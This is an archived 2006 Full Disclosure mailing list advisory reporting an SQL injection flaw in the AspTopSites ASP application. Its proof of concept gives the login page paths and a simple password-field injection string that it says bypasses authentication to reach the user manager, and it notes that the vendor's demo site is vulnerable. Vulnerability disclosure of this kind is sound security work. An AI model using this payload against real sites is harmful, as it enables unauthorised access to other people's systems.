Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

AspTopSites SQL injection
From: "Morning Wood" <se_cur_ity () hotmail com>
Date: Tue, 10 Jan 2006 11:25:04 -0800

------------------------------------------------------------
    - EXPL-A-2006-001 exploitlabs.com Advisory 047 -
------------------------------------------------------------
                         - AspTopSites -






AFFECTED PRODUCTS
=================
AspTopSites
http://www.maine-net.com/aspts.asp



OVERVIEW
========
AspTopSites® runs on your Windows NT/2K/2003 Server
 and uses Active Server Pages with a MS Access 2000 database.
 Simply upload AspTopSites®, make one configuration setting
 and you're ready to start running your own TopSites traffic
 generator.  AspTopSites® comes with full source code...
 no encoding or DLLs need to be installed on the server.





DETAILS
=======
1. SQL Injection

AspTopSites does not filter SQL resulting in
full access to the user manager menu.




POC
===

1.
---

entering SQL Injection type statement in the password field
causes the statement to be true.

http://[host]/topsites/default.asp <--- view listings
http://[host]/topsites/goto.asp?id=43 <--- mouseover id value
http://[host]/topsites/includeloginuser.asp <--- login here
user: [ id value ]
password: 'or'


note: Vendor Demo Site is Vuln



SOLUTION:
=========
vendor contact:
Jan  3, 2006 wills () maine-net com ( no resp )
Jan 10, 2006 ( no resp => release )



Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs

Donnie Werner

mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • AspTopSites SQL injection Morning Wood (Jan 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault